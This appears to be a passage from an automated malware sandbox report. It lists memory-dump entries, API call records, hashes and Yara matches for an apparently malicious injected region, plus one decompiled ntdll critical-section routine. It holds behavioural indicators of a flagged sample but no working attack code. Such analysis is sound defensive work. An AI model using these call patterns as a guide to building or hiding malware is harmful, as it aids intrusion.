                                                • Instruction Fuzzy Hash: D690027138100C42D100615A4809B97000A97E0381F91D016A0214654DCA55C851B561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e8b8faa7093c1d24a1367dc61b7bce4cb0671a78e9e6f7f012cd43fbc84803ab
                                                • Instruction ID: e05a54ce65125bd1a00e1873b1efff4df9f32c64a29b46f088164cd443af7308
                                                • Opcode Fuzzy Hash: e8b8faa7093c1d24a1367dc61b7bce4cb0671a78e9e6f7f012cd43fbc84803ab
                                                • Instruction Fuzzy Hash: 6490027138100C02D180715A480969B000A97D1381FD1D015A0115654DCE558A59B7E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0e593939ad7e8cab25233b2c3ab4ae91a3e5ef303417e7bd63cc798d2da2500e
                                                • Instruction ID: 36250fa266b88150e5f8bc9af74af279514cd254251489127793a1187a039ac3
                                                • Opcode Fuzzy Hash: 0e593939ad7e8cab25233b2c3ab4ae91a3e5ef303417e7bd63cc798d2da2500e
                                                • Instruction Fuzzy Hash: D390027138504C42D140715A4809A97001A97D0385F91D011A0154694DDA658D55F6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e51d1db3ad009fba25f76e764efe1f3fc81027600a7f53e6747776faab3c928e
                                                • Instruction ID: 5066368e859145695bbd5c812398582944066164e09ccf5f384632a30b86a047
                                                • Opcode Fuzzy Hash: e51d1db3ad009fba25f76e764efe1f3fc81027600a7f53e6747776faab3c928e
                                                • Instruction Fuzzy Hash: 7C90027139114802D110615A8809757000A97D1281F91D411A0914558DCAD58891B162
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3253b11f1621d8b62ceed08c812ca8ee0c587bdd65f9671bab853032d1119af4
                                                • Instruction ID: de914fa50ab6810864e9bb65bc3e97cdd421cf0850d566b00174535e3d9885ec
                                                • Opcode Fuzzy Hash: 3253b11f1621d8b62ceed08c812ca8ee0c587bdd65f9671bab853032d1119af4
                                                • Instruction Fuzzy Hash: 5390026939300402D180715A580D65B000A97D1282FD1E415A0105558CCD558869A361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cc0943e9c6573ae2f55ad6e41254d94fd404990cc82cd6c47f89d560adf5a5d0
                                                • Instruction ID: 938b58f57a48b08941f8d0bc190d07170a91deb5675caff486f9d820b9b63148
                                                • Opcode Fuzzy Hash: cc0943e9c6573ae2f55ad6e41254d94fd404990cc82cd6c47f89d560adf5a5d0
                                                • Instruction Fuzzy Hash: 9490027138100802D100659A580D697000A97E0381F91E011A5114555ECAA58891B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 30744ead3260b2df9da81cb06c15c9459f931aeaed322ba43f2ea8b8fcce553f
                                                • Instruction ID: b4ca4d22de5a1d65c87c96940539d2510d303d6c7d80ddc7d22bf7644ab62c8c
                                                • Opcode Fuzzy Hash: 30744ead3260b2df9da81cb06c15c9459f931aeaed322ba43f2ea8b8fcce553f
                                                • Instruction Fuzzy Hash: B99002A1382004034105715A4819667400F97E0281B91D021E1104590DC9658891B165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 798bb7a37de401d9f9fec72bc735503f9a3fa61d5bd421ae9606eb5bacfe69cc
                                                • Instruction ID: a0ecad10839c1e3afcdb9815f0be9a646ce18f23bdb415ddee3b0d5585cd4b2c
                                                • Opcode Fuzzy Hash: 798bb7a37de401d9f9fec72bc735503f9a3fa61d5bd421ae9606eb5bacfe69cc
                                                • Instruction Fuzzy Hash: 59900265391004030105A55A0B09557004B97D53D1391D021F1105550CDA618861A161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00368CF8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: a20fd9a4c2b5181e8dd871cc84ee12b2e76454f50d8b7d40aadb2ef7a22b708a
                                                • Instruction ID: 047d0e1a959116e1c0d0772efc0f27b9c6568cd1080811fed57690654d11b15f
                                                • Opcode Fuzzy Hash: a20fd9a4c2b5181e8dd871cc84ee12b2e76454f50d8b7d40aadb2ef7a22b708a
                                                • Instruction Fuzzy Hash: 283190B2500644BBC725DF64C885FABB7F8BF48700F00851DFA2A9B285DB31A650CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00368CF8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 3e54d8e8c88912e87003bfaeafe529d7487784a4cfeec7a31a70ca71652cfa44
                                                • Instruction ID: 63512bccedf3405f9bdcf790447a4c79255faf098833c4b0402b178a9931fc73
                                                • Opcode Fuzzy Hash: 3e54d8e8c88912e87003bfaeafe529d7487784a4cfeec7a31a70ca71652cfa44
                                                • Instruction Fuzzy Hash: 203105B1500344BBD721EF68C885F6BF7B8EF48700F00C25DEA295B285DB71A560CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00353AF8), ref: 0036A26D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 6c6a7dca25f3e473350029963bdf6b5976d9b54fa95f39c63ee094ea311de7bc
                                                • Instruction ID: e8ea2e5156d664fe70bbe28f4fdcb8a52ce9d2b83314e0b257512c8929ca4160
                                                • Opcode Fuzzy Hash: 6c6a7dca25f3e473350029963bdf6b5976d9b54fa95f39c63ee094ea311de7bc
                                                • Instruction Fuzzy Hash: F8018B752002046BD725DFA8DC85FEB37A8EF48350F058194B91C6B282C631EA01CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00353AF8), ref: 0036A26D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 3443a84e3f14f885a49f69e0956d08e5747a6ff31cfd08f97e393b286149a501
                                                • Instruction ID: 560825295ab1fd1657896cb4355f765fe95f76baa400aee1d1fa2b7259bfdeaa
                                                • Opcode Fuzzy Hash: 3443a84e3f14f885a49f69e0956d08e5747a6ff31cfd08f97e393b286149a501
                                                • Instruction Fuzzy Hash: 8CF0F0B12046046BCB15EFA8DC84EA73B6CEF88350F008699FD4D9B202C230E910CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00353AF8), ref: 0036A26D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 7f435475ece995e25da14c256cf1fc4325ef7c9c22f749802a363912a036a9d6
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 9CE04FB12102046BD714DF59CC45EA777ADEF88750F018554FD085B241C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0035834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0035836B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: af598d09215444e20c2a42521b3edad4258fb6ad42aea9cce3484ba06d5f864f
                                                • Instruction ID: 7d4c9b91d7cdbe08351e9f5c95d5a4aa2143fd06fae7ee76dc852b880616b152
                                                • Opcode Fuzzy Hash: af598d09215444e20c2a42521b3edad4258fb6ad42aea9cce3484ba06d5f864f
                                                • Instruction Fuzzy Hash: A1012D319403287AEB21AB948C02FFE771C6B41F51F054209FF04FE1C1D694690947F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0035834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0035836B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: d0f800050b211bb5b0751991ced225e5378464dfd3b8df71b8661dc9f9100826
                                                • Instruction ID: ca3050c7302e3043eada963afada266579b979ac46993947bc8785d8e376ef62
                                                • Opcode Fuzzy Hash: d0f800050b211bb5b0751991ced225e5378464dfd3b8df71b8661dc9f9100826
                                                • Instruction Fuzzy Hash: 0401A231A802287BE722AA959C03FBE776CAB41F51F054119FF04FE1C1EAD4790A46F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0035834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0035836B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 52aa46d85158c76be47979a7e90655a7f08bf6bfd545deea83f4270f1e24678e
                                                • Instruction ID: d6ce4f1c660a72ff1cf353ef49f6768a3acc38d0c028af529037a06ad91b704b
                                                • Opcode Fuzzy Hash: 52aa46d85158c76be47979a7e90655a7f08bf6bfd545deea83f4270f1e24678e
                                                • Instruction Fuzzy Hash: DCF04C3AB405243AE72366A56C03FFE62589B41F52F054065FF00FF2D5EA91980D46E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0036A304
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 496098f8713fed42a744c2497ba528c4d033057b51e4cffacd5030772e862899
                                                • Instruction ID: 51eb6f3668ea413c39a01cbb6bbb36d668b8473e861e59755bba70c97a7979f7
                                                • Opcode Fuzzy Hash: 496098f8713fed42a744c2497ba528c4d033057b51e4cffacd5030772e862899
                                                • Instruction Fuzzy Hash: D71133B2210108AFCB04CFA9DC80DEB77ADAF9C350F108259FA4D97242C630E811CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0035AD42
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                • Instruction ID: d6b1370be4a57ad8d0f6b1059867a9a92ab1b4ffdd2be6cd7c605be34b620951
                                                • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                • Instruction Fuzzy Hash: E60152B5D0010DB7DB10EAA4DC42FDDB3B89B14309F008294ED089B145F631EB488B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0036A304
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 11ad331afd717686f82e59ef272b8fd90b624a69a104a1095b818994a60cff8b
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 2A01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0035F020,?,?,00000000), ref: 00368DBC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 83e413b34ed275f49d33cd640d9acb1914596b3e59c460f106901387495987fe
                                                • Instruction ID: 8852fa155cccab07787125c86e7cefd6e1a1d13d51775e7160101924ffa473e3
                                                • Opcode Fuzzy Hash: 83e413b34ed275f49d33cd640d9acb1914596b3e59c460f106901387495987fe
                                                • Instruction Fuzzy Hash: 13E092333903043AE331659DAC03FA7B39CDB95B21F554026FB0DEB2C1D996F80142A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0036A304
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91e25ae8e503866701ff2781f58ed2b2f8f6caafc5e7f2b8a5cf2bcaaddbb039
                                                • Instruction ID: 6d1dcf06b4a48b4ad113e1476baf4ab0d90c877e3349d3aff34d9ffed8d5bde9
                                                • Opcode Fuzzy Hash: 91e25ae8e503866701ff2781f58ed2b2f8f6caafc5e7f2b8a5cf2bcaaddbb039
                                                • Instruction Fuzzy Hash: CFE0B6B6210409AF8B04CF88EC91DEB73ADFB8C700710860CFA5DC7204C634E9528BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00364506,?,00364C7F,00364C7F,?,00364506,?,?,?,?,?,00000000,00000000,?), ref: 0036A22D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: 069f56ed3eb089d07badc9a62d4a2eb64a12e3c5f2c14a543bcc28b3aad6e51a
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: B6E046B1210208ABDB14EF99CC41EA777ADEF88750F118558FE086B242C630F911CBF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0035F1A2,0035F1A2,?,00000000,?,?), ref: 0036A3D0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: ff4a42e147b8a66a65a238d61904a6f08b03f338af7e19bf9cb3d80caa004780
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 1BE01AB12002086BDB10DF49CC85EE737ADAF88650F018154BA086B241C930E8118BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,00358CF4,?), ref: 0035F6CB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                • Instruction ID: 5e731e428d73f0739ea7cc3390b0b0f771c171b41a349aa9f13d513c9ed08f2d
                                                • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                • Instruction Fuzzy Hash: 29D0A7717903043BE610FAA49C03F2732CD6B45B01F494074FA48DB3D7D950E4004165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0035836B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 7ce75533347c8accbcb2df1633bf973149e1b9f6e4619cfead146cbd5ac53cbe
                                                • Instruction ID: 7784b6f138f659315f719480edebee278935668a74cd89896fdfd3da4a38357e
                                                • Opcode Fuzzy Hash: 7ce75533347c8accbcb2df1633bf973149e1b9f6e4619cfead146cbd5ac53cbe
                                                • Instruction Fuzzy Hash: 50D022353480240ECB06CA88FC02C7D7378E680712B5405AFEA04CA5C1EA99150F87D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d6f9d9de102acc20d422f62b49f8d9b09360ec98c0960298c41ac9dcad870f06
                                                • Instruction ID: 13c6a4b1a8ff858270073191fd71aeabd19f257322442aad06485a4edea83192
                                                • Opcode Fuzzy Hash: d6f9d9de102acc20d422f62b49f8d9b09360ec98c0960298c41ac9dcad870f06
                                                • Instruction Fuzzy Hash: 14B02B71A810C5C5D600D3600A0C727394077C0340F12C011D1020240B477CC080F1F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 53%
                                                			E02EAFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                				void* _t7;
                                                				intOrPtr _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr* _t12;
                                                				intOrPtr* _t13;
                                                				intOrPtr _t14;
                                                				intOrPtr* _t15;
                                                
                                                				_t13 = __edx;
                                                				_push(_a4);
                                                				_t14 =  *[fs:0x18];
                                                				_t15 = _t12;
                                                				_t7 = E02E5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                				_push(_t13);
                                                				E02EA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                				_t9 =  *_t15;
                                                				if(_t9 == 0xffffffff) {
                                                					_t10 = 0;
                                                				} else {
                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                				}
                                                				_push(_t10);
                                                				_push(_t15);
                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                				return E02EA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                			}










                                                0x02eafdda
                                                0x02eafde2
                                                0x02eafde5
                                                0x02eafdec
                                                0x02eafdfa
                                                0x02eafdff
                                                0x02eafe0a
                                                0x02eafe0f
                                                0x02eafe17
                                                0x02eafe1e
                                                0x02eafe19
                                                0x02eafe19
                                                0x02eafe19
                                                0x02eafe20
                                                0x02eafe21
                                                0x02eafe22
                                                0x02eafe25
                                                0x02eafe40

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EAFDFA
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EAFE01
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EAFE2B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true
                                                • Associated: 00000004.00000002.1047401913.0000000002F0B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000004.00000002.1047414316.0000000002F0F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: 4abd4a69ba57bd6d3e675f65847f43a976e465efe522ed878009af85d82ef345
                                                • Instruction ID: 5a9ec472605bd85b14da62c63494681faeee1d890ac2ef3c3f2f952a37fdd5f8
                                                • Opcode Fuzzy Hash: 4abd4a69ba57bd6d3e675f65847f43a976e465efe522ed878009af85d82ef345
                                                • Instruction Fuzzy Hash: C5F0FC325802017FE6201A55DC45F73BF5BDB44730F249315F618595D1EA62F860C6F4
                                                Uniqueness

                                                Uniqueness Score: -1.00%